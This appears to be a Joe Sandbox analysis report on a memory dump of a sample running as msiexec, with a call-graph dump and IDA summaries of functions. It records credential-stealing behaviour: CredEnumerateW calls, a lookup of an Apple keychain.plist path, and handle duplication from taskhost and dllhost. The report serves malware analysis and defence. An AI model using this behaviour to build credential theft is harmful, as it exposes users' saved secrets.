40149 41f432 40114->40149 40117 437f06 40196 415c56 11 API calls 40117->40196 40118 437f7f 40121 437f95 40118->40121 40124 43802b 40118->40124 40120->40118 40122 432d4e 3 API calls 40120->40122 40197 415c56 11 API calls 40121->40197 40122->40118 40125 4165ff 11 API calls 40124->40125 40126 
438054 40125->40126 40160 437371 40126->40160 40129 43806b 40130 438094 40129->40130 40198 42f50e 137 API calls 40129->40198 40132 437fa3 40130->40132 40133 4300e8 3 API calls 40130->40133 40132->40113 40199 41f638 103 API calls 40132->40199 40133->40132 40135 437d69 40134->40135 40138 437d80 40134->40138 40200 437ccb 11 API calls 40135->40200 40137 437d76 40137->40114 40138->40137 40139 437da3 40138->40139 40140 437d90 40138->40140 40142 438460 133 API calls 40139->40142 40140->40137 40204 437ccb 11 API calls 40140->40204 40145 437dcb 40142->40145 40143 437de8 40203 424f26 122 API calls 40143->40203 40145->40143 40201 444283 13 API calls 40145->40201 40147 437dfc 40202 437ccb 11 API calls 40147->40202 40150 41f54d 40149->40150 40156 41f44f 40149->40156 40151 41f466 40150->40151 40234 41c635 memset memset 40150->40234 40151->40117 40151->40120 40156->40151 40158 41f50b 40156->40158 40205 41f1a5 40156->40205 40230 41c06f memcmp 40156->40230 40231 41f3b1 89 API calls 40156->40231 40232 41f398 85 API calls 40156->40232 40158->40150 40158->40151 40233 41c295 85 API calls 40158->40233 40235 41703f 40160->40235 40162 437399 40163 43739d 40162->40163 40165 4373ac 40162->40165 40242 4446ea 11 API calls 40163->40242 40166 416935 16 API calls 40165->40166 40167 4373ca 40166->40167 40169 438460 133 API calls 40167->40169 40173 4251c4 136 API calls 40167->40173 40177 415a91 memset 40167->40177 40180 43758f 40167->40180 40192 437584 40167->40192 40195 437d3c 134 API calls 40167->40195 40243 425433 13 API calls 40167->40243 40244 425413 17 API calls 40167->40244 40245 42533e 16 API calls 40167->40245 40246 42538f 16 API calls 40167->40246 40247 42453e 122 API calls 40167->40247 40168 4375bc 40250 415c7d 16 API calls 40168->40250 40169->40167 40172 4375d2 40194 4373a7 40172->40194 40251 4442e6 11 API calls 40172->40251 40173->40167 40175 4375e2 40175->40194 40252 444283 13 API calls 40175->40252 40177->40167 40248 42453e 122 API calls 40180->40248 40181 4375f4 40186 437620 
40181->40186 40187 43760b 40181->40187 40185 43759f 40188 416935 16 API calls 40185->40188 40190 416935 16 API calls 40186->40190 40253 444283 13 API calls 40187->40253 40188->40192 40190->40194 40192->40168 40249 42453e 122 API calls 40192->40249 40193 437612 memcpy 40193->40194 40194->40129 40195->40167 40196->40113 40197->40132 40198->40130 40199->40113 40200->40137 40201->40147 40202->40143 40203->40137 40204->40137 40206 41bc3b 100 API calls 40205->40206 40207 41f1b4 40206->40207 40208 41edad 85 API calls 40207->40208 40215 41f282 40207->40215 40209 41f1cb 40208->40209 40210 41f1f5 memcmp 40209->40210 40211 41f20e 40209->40211 40209->40215 40210->40211 40212 41f21b memcmp 40211->40212 40211->40215 40213 41f326 40212->40213 40216 41f23d 40212->40216 40214 41ee6b 85 API calls 40213->40214 40213->40215 40214->40215 40215->40156 40216->40213 40217 41f28e memcmp 40216->40217 40219 41c8df 55 API calls 40216->40219 40217->40213 40218 41f2a9 40217->40218 40218->40213 40221 41f308 40218->40221 40222 41f2d8 40218->40222 40220 41f269 40219->40220 40220->40213 40223 41f287 40220->40223 40224 41f27a 40220->40224 40221->40213 40228 4446ce 11 API calls 40221->40228 40225 41ee6b 85 API calls 40222->40225 40223->40217 40226 41ee6b 85 API calls 40224->40226 40227 41f2e0 40225->40227 40226->40215 40229 41b1ca memset 40227->40229 40228->40213 40229->40215 40230->40156 40231->40156 40232->40156 40233->40150 40234->40151 40236 417044 40235->40236 40237 41705c 40235->40237 40239 416760 11 API calls 40236->40239 40241 417055 40236->40241 40238 417075 40237->40238 40240 41707a 11 API calls 40237->40240 40238->40162 40239->40241 40240->40236 40241->40162 40242->40194 40243->40167 40244->40167 40245->40167 40246->40167 40247->40167 40248->40185 40249->40168 40250->40172 40251->40175 40252->40181 40253->40193 40259 415cfe 40254->40259 40263 415d23 40259->40263 40266 41628e 40259->40266 40260 4163ca 40273 416422 11 API calls 40260->40273 40262 416172 memset 40262->40263 40263->40260 
40263->40262 40264 416422 10 API calls 40263->40264 40265 415cb9 10 API calls 40263->40265 40263->40266 40264->40263 40265->40263 40267 416520 40266->40267 40268 416527 40267->40268 40272 416574 40267->40272 40270 416544 40268->40270 40268->40272 40274 4156aa 11 API calls 40268->40274 40271 416561 memcpy 40270->40271 40270->40272 40271->40272 40272->40066 40273->40266 40274->40270 40296 41493c EnumResourceNamesW 37679 4287c1 37680 4287d2 37679->37680 37681 429ac1 37679->37681 37682 428818 37680->37682 37683 42881f 37680->37683 37703 425711 37680->37703 37693 425ad6 37681->37693 37749 415c56 11 API calls 37681->37749 37716 42013a 37682->37716 37744 420244 96 API calls 37683->37744 37687 4260dd 37743 424251 119 API calls 37687->37743 37689 4259da 37742 416760 11 API calls 37689->37742 37694 429a4d 37699 429a66 37694->37699 37700 429a9b 37694->37700 37697 422aeb memset memcpy memcpy 37697->37703 37745 415c56 11 API calls 37699->37745 37702 429a96 37700->37702 37747 416760 11 API calls 37700->37747 37748 424251 119 API calls 37702->37748 37703->37681 37703->37689 37703->37694 37703->37697 37704 4260a1 37703->37704 37712 4259c2 37703->37712 37715 425a38 37703->37715 37732 4227f0 memset memcpy 37703->37732 37733 422b84 15 API calls 37703->37733 37734 422b5d memset memcpy memcpy 37703->37734 37735 422640 13 API calls 37703->37735 37737 4241fc 11 API calls 37703->37737 37738 42413a 89 API calls 37703->37738 37741 415c56 11 API calls 37704->37741 37705 429a7a 37746 416760 11 API calls 37705->37746 37712->37693 37736 415c56 11 API calls 37712->37736 37715->37712 37739 422640 13 API calls 37715->37739 37740 4226e0 12 API calls 37715->37740 37717 42014c 37716->37717 37720 420151 37716->37720 37759 41e466 96 API calls 37717->37759 37719 420162 37719->37703 37720->37719 37721 4201b3 37720->37721 37722 420229 37720->37722 37723 4201b8 37721->37723 37724 4201dc 37721->37724 37722->37719 37725 41fd5e 85 API calls 37722->37725 37750 41fbdb 37723->37750 37724->37719 37729 4201ff 
37724->37729 37756 41fc4c 37724->37756 37725->37719 37729->37719 37731 42013a 96 API calls 37729->37731 37731->37719 37732->37703 37733->37703 37734->37703 37735->37703 37736->37689 37737->37703 37738->37703 37739->37715 37740->37715 37741->37689 37742->37687 37743->37693 37744->37703 37745->37705 37746->37702 37747->37702 37748->37681 37749->37689 37751 41fbf8 37750->37751 37754 41fbf1 37750->37754 37764 41ee26 37751->37764 37755 41fc39 37754->37755 37774 4446ce 11 API calls 37754->37774 37755->37719 37760 41fd5e 37755->37760 37757 41ee6b 85 API calls 37756->37757 37758 41fc5d 37757->37758 37758->37724 37759->37720 37762 41fd65 37760->37762 37761 41fdab 37761->37719 37762->37761 37763 41fbdb 85 API calls 37762->37763 37763->37762 37765 41ee41 37764->37765 37766 41ee32 37764->37766 37775 41edad 37765->37775 37778 4446ce 11 API calls 37766->37778 37769 41ee3c 37769->37754 37772 41ee58 37772->37769 37780 41ee6b 37772->37780 37774->37755 37784 41be52 37775->37784 37778->37769 37779 41eb85 11 API calls 37779->37772 37781 41ee70 37780->37781 37782 41ee78 37780->37782 37837 41bf99 85 API calls 37781->37837 37782->37769 37785 41be6f 37784->37785 37786 41be5f 37784->37786 37792 41be8c 37785->37792 37816 418c63 memset memset 37785->37816 37815 4446ce 11 API calls 37786->37815 37788 41be69 37788->37769 37788->37779 37790 41bee7 37790->37788 37820 41a453 85 API calls 37790->37820 37792->37788 37792->37790 37793 41bf3a 37792->37793 37794 41bed1 37792->37794 37819 4446ce 11 API calls 37793->37819 37796 41bef0 37794->37796 37799 41bee2 37794->37799 37796->37790 37797 41bf01 37796->37797 37798 41bf24 memset 37797->37798 37800 41bf14 37797->37800 37817 418a6d memset memcpy memset 37797->37817 37798->37788 37805 41ac13 37799->37805 37818 41a223 memset memcpy memset 37800->37818 37804 41bf20 37804->37798 37806 41ac52 37805->37806 37807 41ac3f memset 37805->37807 37810 41ac6a 37806->37810 37821 41dc14 19 API calls 37806->37821 37808 41acd9 37807->37808 37808->37790 37812 41aca1 
37810->37812 37822 41519d 37810->37822 37812->37808 37813 41acc0 memset 37812->37813 37814 41accd memcpy 37812->37814 37813->37808 37814->37808 37815->37788 37816->37792 37817->37800 37818->37804 37819->37790 37821->37810 37825 4175ed 37822->37825 37833 417570 SetFilePointer 37825->37833 37828 41760a ReadFile 37830 417637 37828->37830 37831 417627 GetLastError 37828->37831 37829 4151b3 37829->37812 37830->37829 37832 41763e memset 37830->37832 37831->37829 37832->37829 37834 4175b2 37833->37834 37835 41759c GetLastError 37833->37835 37834->37828 37834->37829 37835->37834 37836 4175a8 GetLastError 37835->37836 37836->37834 37837->37782 37838 417bc5 37840 417c61 37838->37840 37844 417bda 37838->37844 37839 417bf6 UnmapViewOfFile CloseHandle 37839->37839 37839->37844 37842 417c2c 37842->37844 37850 41851e 18 API calls 37842->37850 37844->37839 37844->37840 37844->37842 37845 4175b7 37844->37845 37846 4175d6 CloseHandle 37845->37846 37847 4175c8 37846->37847 37848 4175df 37846->37848 37847->37848 37849 4175ce Sleep 37847->37849 37848->37844 37849->37846 37850->37842 39755 4147f3 39758 414561 39755->39758 39757 414813 39759 41456d 39758->39759 39760 41457f GetPrivateProfileIntW 39758->39760 39763 4143f1 memset _itow WritePrivateProfileStringW 39759->39763 39760->39757 39762 41457a 39762->39757 39763->39762

Control-flow Graph

(Legend: Executed / Not Executed)

[Control-flow graph of the function at 40dd85, as rendered by the interactive viewer; basic-block ranges and edges are not reproduced here. The blocks call memset, call 409bca, CreateFileW, call 40afcf, call 41352f, NtQuerySystemInformation, CloseHandle, GetCurrentProcessId, call 413cfa, call 413d4c, call 40e6ad, call 409c52, _wcsicmp, call 413d29, OpenProcess, GetCurrentProcess and DuplicateHandle.]
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                          • API String ID: 708747863-3398334509
                                                                                                                                                                                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3558857096-0
                                                                                                                                                                                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 
445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 142 445849 71->142 94 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->94 95 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->95 146 44589f 85->146 86->54 89 44568b-4456a4 call 40a9b5 call 4087b3 87->89 107 4456ba-4456c4 88->107 148 4456a9-4456b0 89->148 165 445d67-445d6c 94->165 166 445d71-445d83 call 445093 94->166 196 445e17 95->196 197 445e1e-445e25 95->197 121 4457f9 107->121 122 4456ca-4456d3 call 413cfa call 413d4c 107->122 121->6 174 4456d8-4456f7 call 40b2cc call 413fa6 122->174 139->140 140->23 142->56 146->67 148->88 148->89 154->107 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->76 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->54 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 
270->220 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                          • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                          • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                          • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                          • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                          • API String ID: 2263259095-3798722523
                                                                                                                                                                                                          • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000009.00000002.144189493558.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
